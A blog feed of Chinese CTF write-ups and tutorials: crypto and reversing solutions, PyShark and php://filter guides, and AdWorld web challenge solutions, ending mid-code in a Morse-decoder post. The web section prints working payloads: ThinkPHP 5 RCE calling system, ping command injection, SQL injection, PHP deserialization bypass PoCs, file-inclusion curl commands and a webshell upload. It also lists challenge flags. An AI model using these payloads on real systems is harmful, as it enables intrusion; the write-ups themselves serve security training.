通过 binwalk 找到图片文件末尾有 RAR 压缩包

binwalk_result

使用 7-zip 打开压缩包发现 NTFS 流隐写,Base64 换表解密得到 flag

ntfs_stream_stego

CRYPTO

简单数学题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import libnum
sum = 15870713655456272818998868095126610389501417235762009793315127525027164306871912572802442396878309282140184445917718237547340279497682840149930939938364752
dif = 836877201325346306269647062252443025692393860257609240213263622058769344319275021861627524327674665653956022396760961371531780934904914806513684926008590
p = (sum + dif) // 2
q = sum - p
n = p * q
phi_n = (q - 1) * (p - 1)
e = 65537
c = 24161337439375469726924397660125738582989340535865292626109110404205047138648291988394300469831314677804449487707306159537988907383165388647811395995713768215918986950780552907040433887058197369446944754008620731946047814491450890197003594397567524722975778515304899628035385825818809556412246258855782770070

d = pow(e, -1, phi_n)

m = pow(c, d, n)

flag = libnum.n2s(m)
flag = flag.decode('utf-8')
print(flag)
1
DASCTF{ok_1+1_1s_ez_so_try2goldbachs}

AES

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
import base64
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
import hashlib

def decrypt_aes_cbc(ciphertext_b64, password, iv):
    key = hashlib.md5(password.encode()).digest()[:16]

    cipher = AES.new(key, AES.MODE_CBC, iv.encode())

    ciphertext = base64.b64decode(ciphertext_b64)

    plaintext_padded = cipher.decrypt(ciphertext)
    plaintext = unpad(plaintext_padded, AES.block_size)

    return plaintext.decode('utf-8')

if __name__ == "__main__":
    ciphertext = "H4vkfGfsU+qBEwaa7ea9gBkRcraMqbe4BGaxDb/9JG4zGleqT1VxyzGbDj/yuQn8"
    password = "Cryptography"
    iv = "0123456789abcdef"

    plain = decrypt_aes_cbc(ciphertext, password, iv)
    print(plain)
1
DASCTF{A3S_CBC_M0d3_1s_1nt3r3st1ng}

base64

直接 CyberChef Base64解密

1
DASCTF{40b90508f63bc79628b2edc775e148b9}

REVERSE

Androidtest

直接反编译安装包中的 lib 库发现只实现了一个字符串对比功能,根据字符串特征判断为 Base32 加密

IDA_libtest

通过 jadx 打开安装包找到 Native 函数的用例

jadx_usage

在 jadx 页面向上找到异或操作

xor_operation

再向上找到异或所用的 length 值 44

xor_param

1
2
3
4
5
6
import base64

a = list(base64.b32decode('NBWX633YNJLU2QSILZBUKSDTJVBFQRLTJVBEQ42YJFPVQ42FL5ZUKQSYJFPESX2YIVBEWUI='))

for i in a:
    print(chr(i ^ 44), end='')
1
DASCTF{android_anti_and_test_is_interesting}

AI安全

寻找可爱的小狗

通过人工找出在 1006 张图片中有 6 张小猫照片

result

按照题目要求将文件名排序后进行 MD5 计算得出flag

1
2
3
4
5
6
7
8
external = '26c39cf8-55fb-4899-82bc-442cf4627d95.jpg+6e17fffa-b696-4769-9b43-e0f453f8098d.jpg+7a19da17-9f4a-411b-bac7-83d2454d868a.jpg+897a3a87-dfcf-4233-8097-6bba2e6507ba.jpg+c6b1099a-d626-4cbd-94fc-32aa46ffb02b.jpg+d5117480-7943-48f8-9e79-67fdd51092d2.jpg'

import hashlib

# 创建md5对象
md5_obj = hashlib.md5()
md5_obj.update(external.encode())
print(md5_obj.hexdigest())
1
DASCTF{4c5e686c28a5409e6f19598b97d39964}

数据安全

check1

根据给出的信息验证规则编写验证脚本,使用 csv 库读取与写入 csv 文件,datetime 库处理日期时间信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
def id_check(id):
    if len(id) != 18: return False
    if id[-1].upper() == 'X':
        if not id[:-1].isdigit(): return False
    else:
        if not id.isdigit(): return False
    if id_verify(id) != id[-1].upper(): return False
    return True

def id_verify(id):
    c = [7, 9, 10, 5, 8, 4, 2, 1, 6, 3, 7, 9, 10, 5, 8, 4, 2]
    b = [int(id[i]) * c[i] for i in range(17)]
    a = sum(b) % 11
    m = ['1', '0', 'X', '9', '8', '7', '6', '5', '4', '3', '2']
    return m[a]

def sex_verify(id, sex):
    sex_id = id[-2]
    if int(sex_id) % 2 == 0:
        return sex == '女'
    else:
        return sex == '男'

def birth_check(id, birthday):
    id_birth_year = id[6:10]
    id_birth_month = id[10:12]
    id_birth_day = id[12:14]
    birthday_from_info = birthday.split('-')
    return int(id_birth_year) == int(birthday_from_info[0]) and int(id_birth_month) == int(birthday_from_info[1]) and int(id_birth_day) == int(birthday_from_info[2])

def mobile_check(mobile):
    if len(mobile) != 11: return False
    if not mobile.startswith('1'): return False
    if not mobile.isdigit(): return False
    return True

from datetime import datetime
def time_logic_check(birthday, register, last_login):
    birth_date = datetime.strptime(birthday, '%Y-%m-%d')
    register_date = datetime.strptime(register, '%Y-%m-%d %H:%M:%S')
    last_login_date = datetime.strptime(last_login, '%Y-%m-%d %H:%M:%S')
    return (birth_date < register_date) and (register_date <= last_login_date)

def name_check(name):
    if len(name) < 2 or len(name) > 4: return False
    if not name.isalpha(): return False
    return True

import csv

info_legal = []
with open('data.csv', 'r', encoding='utf-8') as file:
    reader = csv.reader(file)
    for row in reader:
        # 1.身份证号格式验证
        if not id_check(row[2]):
            continue
        if not id_verify(row[2]):
            continue
        # 2.性别一致性验证
        if not sex_verify(row[2], row[3]):
            continue
        # 3.出生日期一致性验证
        if not birth_check(row[2], row[5]):
            continue
        # 4.手机号格式验证
        if not mobile_check(row[4]):
            continue
        if not time_logic_check(row[5], row[6], row[7]):
            continue
        # 6.姓名格式验证
        if not name_check(row[1]):
            continue
        info_legal.append(row)

with open('legals.csv', 'w', encoding='utf-8', newline='') as file:
    writer = csv.writer(file)
    writer.writerow(['客户ID','姓名','身份证号','性别','手机号','出生日期','注册时间','最后登录时间'])
    for row in info_legal:
        writer.writerow(row)

DASCTF{73692433520529165875247074902265}

shop

同样根据给出的检测规范模板编写验证脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
balance_error = []
bank_error = []
frequent_error = []

price_area = {
    '电子产品': [100, 5000],
    '服装鞋包': [50, 1000],
    '家居用品': [30, 2000],
    '美妆护肤': [20, 800],
    '食品饮料': [5, 300],
    '图书文具': [5, 200],
    '运动户外': [50, 3000]
}
def balance_check(goods_type, price):
    return not (float(price) < price_area[goods_type][0] or float(price) > price_area[goods_type][1])

def bank_check(bank):
    if len(bank) < 16 or len(bank) > 19 or not bank.isdigit(): return False
    s = 0
    for i in range(len(bank) - 1, -1, -1):
        t = int(bank[i])
        if (len(bank) - i) % 2 == 0:
            t = t * 2
        t = t % 9
        s += t
    return (s % 10 == 0)


usage_analyze = {
    '': {
        '0000000000000000': []
    }
}
def usage_check(row):
    order_hour = row[3].split(':')[0]
    if usage_analyze.get(order_hour) == None:
        usage_analyze.update({order_hour: dict()})
    if usage_analyze[order_hour].get(row[6]) == None: # row[6] = 银行卡号
        usage_analyze[order_hour].update({row[6]: list()})
    usage_analyze[order_hour][row[6]].append(row[1])

order_analyze = {
}
def order_check(row):
    order_hour = row[3].split(':')[0]
    if order_analyze.get(order_hour) == None:
        order_analyze.update({order_hour: dict()})
    if order_analyze[order_hour].get(row[1]) == None: # row[1] = 用户ID
        order_analyze[order_hour].update({row[1]: 0})
    order_analyze[order_hour][row[1]] += 1

import csv
from datetime import datetime
with open('data.csv', 'r', encoding='utf-8') as file:
    reader = csv.reader(file)
    for row in reader:
        # 1.金额异常检测
        if not balance_check(row[4], row[2]):
            balance_error.append(row[1])
        # 2.银行卡异常检测
        if not bank_check(row[6]):
            bank_error.append(row[1])
        # 2.3使用异常检测
        usage_check(row)
        # 3.频率异常检测
        order_check(row)

for hour in usage_analyze.keys():
    for card in usage_analyze[hour].keys():
        if len(usage_analyze[hour][card]) > 1:
            for user_id in usage_analyze[hour][card]:
                bank_error.append(user_id)


for hour in order_analyze.keys():
    for user_id in order_analyze[hour].keys():
        if order_analyze[hour][user_id] > 10:
            print(hour, user_id, order_analyze[hour][user_id])
            frequent_error.append(user_id)

with open('illegals.csv', 'w', encoding='utf-8', newline='') as file:
    writer = csv.writer(file)
    writer.writerow(['用户ID', '异常类型'])
    for user_id in list(dict.fromkeys(balance_error)):
        writer.writerow([user_id, '金额异常'])
    for user_id in list(dict.fromkeys(bank_error)):
        writer.writerow([user_id, '银行卡异常'])
    for user_id in list(dict.fromkeys(frequent_error)):
        writer.writerow([user_id, '频率异常'])

DASCTF{89448851859314492663739829500496}

]]> https://blog.moling.ink/articles/8th-nisc-ctf-dasctf/ 2025-11-16T12:34:41.000Z 第八届浙江省大学生网络与信息安全竞赛决赛完整 WriteUp,包含 Web 前端限制绕过、Misc 图片隐写与 NTFS 流隐写、Crypto RSA 与 AES 解密、Reverse Android APK 逆向分析、AI 安全图像分类与数据安全(身份证校验、银行卡 Luhn 算法、交易异常检测)等六大模块的详细解题过程 第八届浙江省大学生网络与信息安全竞赛网络安全技能挑战赛 决赛WP 2026-03-24T07:16:31.684Z Malpl3naInk 安装

  • 安装 Wireshark 时勾选安装 Tshark

    安装Tshark

  • pip 安装 Pyshark

1
pip install pyshark

  • 将 Wireshark 安装目录添加到环境变量

    环境变量

  • 找到 PyShark 库安装位置下的 config.ini,将 tshark_path 修改为安装路径

    安装路径

从读取 pcap/pcapng 文件开始

示例题目: BUUCTF - easycap

1
2
3
4
5
6
import pyshark # 导入 pyshark 库
# 通过路径定位 pcap 文件位置并创建 FileCapture 类
cap = pyshark.FileCapture('F:\\easycap.pcap')
# 遍历数据包
for pkt in cap:
    print(pkt.highest_layer, pkt.length)

运行结果

从运行结果可知,包含数据的 TCP 包的 highest_layer 会被标记为 DATA

1
2
3
for pkt in cap: # 遍历数据包
    if 'DATA' in pkt: # 当 highest_layer 为 DATA 时
        print(pkt.tcp.payload) # 打印 TCP Payload
1
2
3
4
5
6
7
F:\>python shark.py
46
4c
41
47
3a
...

最后将十六进制 Payload 转为 char

1
2
3
4
for pkt in cap: # 遍历数据包
    if 'DATA' in pkt: # 当 highest_layer 为 DATA 时
        # TCP Payload 转为字符并打印
        print(chr(int(pkt.tcp.payload, 16)))
1
2
3
4
5
6
7
F:\>python shark.py
F
L
A
G
:
...

对于一些不常见的数据包类型

示例题目:
第八届浙江省大学生网络与信息安全竞赛网络安全技能挑战赛-预赛
MISC - 小小作曲家

依然通过遍历数据包获取 highest_layer 类型

1
2
for pkt in cap:
    print(pkt.highest_layer, pkt.length)
1
2
3
4
5
6
7
8
9
10
11
12
13
F:\>python shark.py
DATA 36
DATA 46
DATA 36
DATA 129
DATA 36
USB 28
USBAUDIO 31
USB 27
USBAUDIO 31
USB 27
USBAUDIO 31
...

了解到 highest_layer 类型为 USBAUDIO,通过 layers 属性获取数据包内所有 layer

1
2
pkt = cap[6]
print(pkt.layers)
1
2
F:\>python shark.py
[<USB Layer>, <USBAUDIO Layer>]

通过 field_names 属性获取具体属性名称

1
2
pkt = cap[6]
print(pkt.usbaudio.field_names)
1
2
F:\>python shark.py
['midi_cable_number', 'midi_code_index', 'midi_event']

结合 Wireshark 中显示的结构,具体数据位于 midi_event

1
2
pkt = cap[6]
print(pkt.usbaudio.midi_event)
1
2
F:\>python shark.py
90:40:64

确认与 Wireshark 显示内容相同

Wireshark

]]> https://blog.moling.ink/articles/usage-of-pyshark/ 2025-11-10T08:24:07.000Z 从零开始学习 PyShark 库的安装配置与实战应用,通过 CTF 真题演示如何使用 Python 结合 Tshark 解析 pcap/pcapng 文件、提取 TCP Payload、处理 USBAudio 等特殊数据包类型的完整流程 一文学会PyShark基本使用 2026-03-24T07:16:31.687Z Malpl3naInk php://filter

PHP伪协议以php://filter/开头,后方参数以/分割,主要有以下三种参数

  • resource
    • 必选参数,用于标识需要应用过滤器的数据源
  • read
    • 可选参数, 后接需要对数据源应用的过滤器列表,过滤器直接使用|分割
  • write
    • 可选参数, 与read相同

数据将从resources数据源中取出,经过read/write过滤器从前向后处理后输出

1
php://filter/read=convert.base64-encode/resource=filter.txt

以上过滤器会将filter.txt中的数据通过convert.base64-encodeBase64编码后输出

1
php://filter/read=convert.base64-encode|string.toupper/resource=filter.txt

以上过滤器会将filter.txt中的数据通过编码后转换为大写输出

注意
将Base64编码全部转换为大写会导致无法解码,此处仅做多个过滤器示例使用

过滤器列表

字符串过滤器

string.rot13

ROT13是一种简易的替换式密码,应用ROT13密码只需要将每一个字母替换为26位字母表中向后13位的字母
如字母A将被替换为NB替换为O
由于英文字母只有26个,因此对应用过ROT13的文本再次应用即可还原为原始文本

string.toupper

将字母转换为大写

string.tolower

将字母转换为小写

string.strip_tags

PHP7.3.0开始,此方法已经被废弃

去除文本中的标记,如html标记<b> <div>等,PHP标记<?php?>

转换过滤器

convert.base64-encode(decode)

base64-encode用于Base64编码,base64-decode用于解码,无需赘述

convert.iconv.*

等效于PHPiconv函数,格式通常为convert.iconv.<from>.<to>,用于将一种编码的文本转换为另一种编码

压缩过滤器

zlib.deflate(inflate)

zlib压缩(deflate)和解压(inflate)

bzip2.compress(decompress)

bzip2压缩(compress)和解压(decompress)

]]> https://blog.moling.ink/articles/usage-of-php-filter/ 2024-11-19T18:15:16.000Z 详细总结 PHP 伪协议 php://filter 的参数结构、过滤器链使用方法及在文件包含漏洞利用中的常见技巧,涵盖字符串过滤器、转换过滤器和压缩过滤器的实战用法 PHP伪协议php://filter的使用 2026-03-24T07:16:31.687Z Malpl3naInk

排序方式: 新手模式 -> 全部

难度1

Training-WWW-Robots

访问网站得到以下内容

In this little training challenge, you are going to learn about the Robots_exclusion_standard.
The robots.txt file is used by web crawlers to check if they are allowed to crawl and index your website or only parts of it.
Sometimes these files reveal the directory structure instead protecting the content from being crawled.

Enjoy!

题目名字和网站都提到了 Robots

访问robots.txt

1
2
3
4
5
6
User-agent: *
Disallow: /fl0g.php


User-agent: Yandex
Disallow: *

得到 fl0g.php 文件位置,访问得到flag

Flag 
1
cyberpeace{4d4fd53177e175995c241699abc6a611}

unserialize3

访问网站得到代码

1
2
3
4
5
6
class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
?code=

CVE-2016-7124绕过_wakeup()

序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行

PoC

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php
class xctf{
    public $flag = '111';
    public function __wakeup(){
    exit('bad requests');
    }
}
$obj = new xctf();
$serialized = serialize($obj);
// __wakeup绕过
$serialized = str_replace(':1:',':2:', $serialized);
echo $serialized;
?>
Flag 
1
cyberpeace{8d7a6f9b7f6f600e0d8623cdb79d84b4}

ics-06

访问网站,是一个管理系统

adworld-web-writeups__ics-06__00.jpg

在左边一列一个个点下去,只有报表中心可以访问

adworld-web-writeups__ics-06__01.jpg

发现网址中存在id参数

adworld-web-writeups__ics-06__02.jpg

将请求放入Burpsuite Intruder中,在id处放置Payload占位符,在右侧选择数值并填写到(To)

adworld-web-writeups__ics-06__03.jpg

扫描完成后,将结果导出为csv文件并导入Excel

adworld-web-writeups__ics-06__04.jpg

筛选出长度变化最大的一个项

adworld-web-writeups__ics-06__05.jpg

此时 Payload 值为 2333,即 id=2333

在浏览器中访问得到flag

Flag 
1
cyberpeace{0a4e47c15cde843096b309f3f6ff9146}

view_source

根据题目名称 view_source 已经题目描述知道要查看源代码

查看源代码的几种方式(Edge浏览器)

右键网页 -> 检查 -> 元素 (本题不可用)
右键网页 -> 查看网页源代码 (本题不可用)
直接按F12
Ctrl+U

在网页注释中找到flag

Flag 
1
cyberpeace{cd9281496c84e971c42703d2f0e52373}

get_post

答案在题干上

请用GET方式提交一个名为a,值为1的变量

在浏览器地址栏最后添加 ?a=1

http://61.147.171.105:62369/?a=1

请用GET方式提交一个名为a,值为1的变量
请再以POST方式随便提交一个名为b,值为2的变量

curl发送POST请求

Payload

1
curl http://61.147.171.105:62369/?a=1 -d b=2
Flag 
1
cyberpeace{09722afc6616551ee9f2d45cacc32588}

robots

Training-WWW-Robots一样,访问 robots.txt

1
2
3
User-agent: *
Disallow: 
Disallow: f1ag_1s_h3re.php

访问 f1ag_1s_h3re.php 得到flag

Flag 
1
cyberpeace{bee458a1c727279c453de7791fae7fc0}

backup

答案在题干

你知道index.php的备份文件名吗?

直接访问 index.php.bak ( bakbackup - 备份 的缩写,计算机中 .bak 文件通常作为源文件的备份)

Flag 
1
Cyberpeace{855A1C4B3401294CB6604CCC98BDE334}

答在题

访问网站,F12 打开 DevTools,打开 网络 选项刷新页面

adworld-web-writeups__cookie__00.jpg

Set-Cookie 中找到 cookie.php,访问后提示

See the http response

还是在 DevTools响应标头 中找到flag

Flag 
1
cyberpeace{2a45151382ee79c8309ee269af730093}

disabled_button

都做过的题,开发者工具把 disabled 删除就行

adworld-web-writeups__disabled_button__00.jpg

Flag 
1
cyberpeace{d38ab1bf8e2c67c9338980f3e051f094}

weak_auth

题目说随手设了个密码,那就随手输个密码

用户名 admin
密码 123456

Flag 
1
cyberpeace{edb57643d68eb9481d0d05d3d0f8537c}

simple_php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
show_source(__FILE__);
include("config.php");
$a=@$_GET['a'];
$b=@$_GET['b'];
if($a==0 and $a){
    echo $flag1;
}
if(is_numeric($b)){
    exit();
}
if($b>1234){
    echo $flag2;
}
?>

需要传入a和b两个参数,参数a需要满足 $a==0$a==true ;参数b需要满足 is_numeric($b) 判断为非数值的同时 $b>1234

参数a

首先是参数a,可能的结果只有 true and true 或者 false and false

假设要让 $a==0true, a的值只能为 "0"(自动类型转换为数字 0 ),此时条件变为 if(true and $a)

在PHP中,0 / 0.0 / "0" / NULL / ""(空字符串)被认为是false,也就是说此时条件变为 if(true and false) ,不满足题目条件

因此应让 $a 的值不应为数值型字符串

在PHP的松散比较 == 中,非数字字符串将被转换为 0,因此当a的值为任意字符串时,$a==0 的结果将永远为true

在接下来的and判断中,$a(非空字符串)又将被视为 true

因此参数a的值可以为任意非数值字符串

参数b

接下来是参数b,需要在被 is_numeric() 函数判断为非数值的同时在数值比较中大于1234

is_numeric() 函数用于判断一个字符串是否为数值字符串,当字符串中存在一个非数值字符串时返回false(不是数值字符串)

而PHP中的 > 比较会将字符串从前向后找数值,遇到非数值时停止

基于以上两点,参数b的值可以为 1235a / 123456bn任何大于1234的数值 + 任意个非数值字符 的组合

Payload

1
http://61.147.171.105:56707/?a=a&b=1235n
Flag 
1
Cyberpeace{647E37C7627CC3E4019EC69324F66C7C}

baby_web

答在题,一般来说网站的初始界面都是 index (.php/.html/…)

访问 index.php,自动跳转到 1.php

curl访问 index.php

Flag is hidden!

flag被藏起来了,添加 -i 显示相应头,在 FLAG 参数中找到flag

Flag 
1
flag{very_baby_web}

inget

又有ID又有绕过,直接盲猜SQL注入

猜测SQL语句如下

1
WHERE id='${id}'

构造id值使得SQL语句变为

1
WHERE id='' or ''=''

即id值为 ' or ''='

Flag 
1
cyberpeace{d26c1723d6c25158603ffd3fb23aa235}

fileinclude

访问网站

Notice: Undefined index: language in /var/www/html/index.php on line 9
Please choose the language you want : English or Chinese
Hi,EveryOne,The flag is in flag.php

提示flag在 flag.php

开发者工具查看源代码,在注释里找到PHP的源代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?php
if( !ini_get('display_errors') ) {
  ini_set('display_errors', 'On');
  }
error_reporting(E_ALL);
$lan = $_COOKIE['language'];
if(!$lan)
{
@setcookie("language","english");
@include("english.php");
}
else
{
@include($lan.".php");
}
$x=file_get_contents('index.php');
echo $x;
?>

代码从cookie中提取 language 字段并include

构造PHP过滤器读取flag.php内容

adworld-web-writeups__fileinclude__00.jpg

Base64解码即可

Payload

1
curl -X GET "http://ip:port/index.php" -H "Cookie: language=php://filter/read=convert.base64-encode/resource=flag"
Flag 
1
cyberpeace{027a5e33c7c06bdec47b24ab881186b2}

fileclude

访问网站获取源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET["file1"]) && isset($_GET["file2"]))
{
    $file1 = $_GET["file1"];
    $file2 = $_GET["file2"];
    if(!empty($file1) && !empty($file2))
    {
        if(file_get_contents($file2) === "hello ctf")
        {
            include($file1);
        }
    }
    else
        die("NONONO");
}

第一行中已经include了flag.php,因此flag值可能在注释中

file_get_contents($file2) === "hello ctf" 限定参数file2中内容必须为 hello ctf

通过 php://input 与POST方法绕过

使用过滤器读flag.php内容并转为Base64

Payload

1
curl -X POST "http://ip:port/?file1=php://filter/read%3Dconvert.base64-encode/resource%3Dflag.php&file2=php://input" -H "Content-Type: text/plain" -d "hello ctf"
Flag 
1
cyberpeace{79f1764b4a555ea2d6f0abdbdd6c261e}

难度2

upload1

打开网站,只有一个上传点,尝试上传php文件

弹出了javascript的alert警告框,猜测为前端对上传内容做了限制

启用DevTool的替代模式

adworld-web-writeups__upload1__00.jpg

删除判断后缀的代码

adworld-web-writeups__upload1__01.jpg

上传成功,蚁剑连接得到flag

adworld-web-writeups__upload1__02.jpg

Flag 
1
cyberpeace{fed234f59d01a227d353e95bc38aea35}

xff_referer

题目提示可以伪造 X-Forwarded-ForReferer ,访问网站

ip地址必须为123.123.123.123

向请求头添加 X-Forwarded-For

adworld-web-writeups__xff_referer__00.jpg

必须来自https://www.google.com

向请求头添加 Referer

adworld-web-writeups__xff_referer__01.jpg

Flag 
1
cyberpeace{b1fc04c4bb57c105c1e5924c6d073897}

command_execution

题目提示ping命令没有waf,使用 && 连接两个命令

使用find命令搜索文件名flag

127.0.0.1 && find / -name “flag*”

adworld-web-writeups__command_execution__00.jpg

找到flag在/home/flag.txt, cat出来

Flag 
1
cyberpeace{038d89f203be4c8a8874129d4337275e}

web2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php
$miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws";

function encode($str){
    $_o=strrev($str);
    // echo $_o;
        
    for($_0=0;$_0<strlen($_o);$_0++){
       
        $_c=substr($_o,$_0,1);
        $__=ord($_c)+1;
        $_c=chr($__);
        $_=$_.$_c;   
    } 
    return str_rot13(strrev(base64_encode($_)));
}

highlight_file(__FILE__);
/*
   逆向加密算法,解密$miwen就是flag
*/
?>

首先使用CyberChef对密文进行初步处理,对应加密代码中的

1
return str_rot13(strrev(base64_encode($_)));

adworld-web-writeups__web2__00.jpg

使用python逆向加密算法得出flag

1
2
3
4
5
6
7
8
9
10
11
_ = '~88:36e1bg8438e41757d:29cgeb6e48c`GUDTO|;hbmg'
_str = []

for _c in _:
    __ = ord(_c)
    _c = chr(__ - 1)
    _str.append(_c)

_str.reverse()

print(''.join(_str))
Flag 
1
flag:{NSCTF_b73d5adfb819c64603d7237fa0d52977}

Web_php_unserialize

index.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
if (isset($_GET['var'])) { 
    $var = base64_decode($_GET['var']); 
    if (preg_match('/[oc]:\d+:/i', $var)) { 
        die('stop hacking!'); 
    } else {
        @unserialize($var); 
    } 
} else { 
    highlight_file("index.php"); 
} 
?>

从上至下共有以下几点

  • 从URL接收 var 参数

  • Base64 解码var参数

  • 正则匹配 O:<任意数字>:C:<任意数字>:

  • __wakeup() 将$file的值限定为index.php

反向操作,绕过_wakeup()

序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行

O:4:”Demo”:1:{s:10:”Demofile”;s:8:”fl4g.php”;}

绕过正则

O:+4:”Demo”:2:{s:10:”Demofile”;s:8:”fl4g.php”;}

最后进行Base64编码

注意

adworld-web-writeups__Web_php_unserialize__00.jpg

由于变量file的类型为 private,因此在 Demo 两边各有一个空字节

PoC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<?php
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
$obj = new Demo('fl4g.php');
$serialized = serialize($obj);
// +号绕过
$serialized = str_replace('O:4','O:+4', $serialized);
// __wakeup绕过
$serialized = str_replace(':1:',':2:', $serialized);
// Base64编码
$serialized = base64_encode($serialized);
echo $serialized;
?>
Flag 
1
ctf{b17bd4c7-34c9-4526-8fa8-a0794a197013}

php_rce

题目提示了PHP的Rce,访问网站得到版本为 ThinkPHP V5

存在ThinkPHP 5.0.23/5.1.31 - 远程命令执行漏洞

Payload

1
http://ip:port/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag;'
Flag 
1
flag{thinkphp5_rce}

Web_php_include

题目为PHP文件包含,查看源代码

1
2
3
4
5
6
7
8
9
<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>

include源由参数page控制,过滤了 php://,但可以用 phP://

构造过滤器,phP://input 从POST请求体取得PHP代码执行

尝试使用 eval 函数执行命令,报500错误

adworld-web-writeups__Web_php_include__00.jpg

改用 system 函数成功执行

adworld-web-writeups__Web_php_include__01.jpg

ls找到文件 fl4gisisish3r3.php, cat出来

adworld-web-writeups__Web_php_include__02.jpg

Flag 
1
ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}
]]> https://blog.moling.ink/articles/adworld-web-writeups/ 2024-11-14T18:59:46.000Z 系统整理攻防世界平台 Web 安全题目的详细解题思路与 WriteUp,按难度分级涵盖 Robots 协议、Cookie 伪造、文件包含、SQL 注入、命令执行、文件上传、PHP 反序列化、ThinkPHP RCE 等多个知识点 攻防世界WEB题WriteUp收集 2026-03-24T07:16:31.687Z Malpl3naInk

本人并非专业人士,在部分专业名词的表述上可能会出现错误,敬请谅解

同步自本人 CSDN

前段时间在 BugKu 做题时碰到了这么一题 铁子,来一道 - Bugku CTF
(WriteUp 可见同学的博客 【BugKu】铁子,来一道_s1ameseL的博客-CSDN博客)
在解题过程中有一步,需要从音频中提取出摩斯密码。看了同学写的 WriteUp 后,我突发奇想,决定写一个自动从音频中提取摩斯密码的程序,于是就有了这么个工具

Github地址: https://github.com/Malpl3naInk/MorseAudioDecoder

编写过程

载入音频

在这里使用的是 python 的 wave

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# 加载音频
audio = wave.open(sys.argv[1], 'rb')

# 读音频信息
params = audio.getparams()
print(params)
n_channels, _, sample_rate, n_frames = params[:4]

# 读频谱信息
str_wave_data = audio.readframes(n_frames)
audio.close()

# 将频谱信息转为数组
wave_data = np.frombuffer(str_wave_data, dtype=np.short).T

提取数据

计算出横轴的时间轴后,使用 pylab 库绘制频谱图像

1
2
3
time = np.arange(0, n_frames) * (1.0 / sample_rate)
pylab.plot(time, wave_data)
pylab.show()

结果如下
analyze-morse-code-from-audio_01.png
对于如何区分长(“-“)与短(“.”),我想到的方法是计算出所有信号的平均长度,大于平均长度的即为长(“-“)

1
2
# 计算平均频率
wave_avg = int(sum([abs(x / 10) for x in wave_data]) / len(wave_data))

在此处有个小插曲,由于音频的波形呈现正弦型,所以在带有信息的区域也会出现频率值为0的情况,最终生成的数据也无法转换为摩斯密码
analyze-morse-code-from-audio_02.png
后来在 Python 波形处理_Rone-X的博客-CSDN博客 这篇博客中发现可以取一段区域内的平均值
比较代码如下,使用了 tqdm 库显示绘制进度

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
# 绘制摩斯图像
morse_block_sum = 0  # 待划分的数据
morse_block_length = 0  # 待划分的数据长度
morse_arr = []
time_arr = []
pbar = tqdm(wave_data, desc="Drawing Morse Image")
for i in pbar:
    # 高于平均值记为 1 ,反之为 0
    if abs(i) > wave_avg:
        morse_block_sum += 1
    else:
        morse_block_sum += 0
    morse_block_length += 1
    # 将数据按照指定长度划分
    if morse_block_length == 100:
        # 计算划分块的平均值
        if math.sqrt(morse_block_sum / 100) > 0.5:
            morse_arr.append(1)
        else:
            morse_arr.append(0)
        # 横坐标
        time_arr.append(len(time_arr))
        morse_block_length = 0
        morse_block_sum = 0

最后生成的图像如下
analyze-morse-code-from-audio_03.png
接着取出 0 位和 1 位的长度信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
# 摩斯电码 按信号长度存储
morse_type = []
morse_len = []
# 摩斯电码长度     0  1
morse_obj_sum = [0, 0]
morse_obj_len = [0, 0]
for i in morse_arr:
    if len(morse_type) == 0 or morse_type[len(morse_type) - 1] != i:
        morse_obj_len[i] += 1
        morse_obj_sum[i] += 1
        morse_type.append(i)
        morse_len.append(1)
    else:
        morse_obj_sum[i] += 1
        morse_len[len(morse_type) - 1] += 1

# 计算信息与空位的平均长度
morse_block_avg = morse_obj_sum[1] / morse_obj_len[1]
morse_blank_avg = morse_obj_sum[0] / morse_obj_len[0]

与平均长度比较

1
2
3
4
5
6
7
8
9
10
11
12
13
14
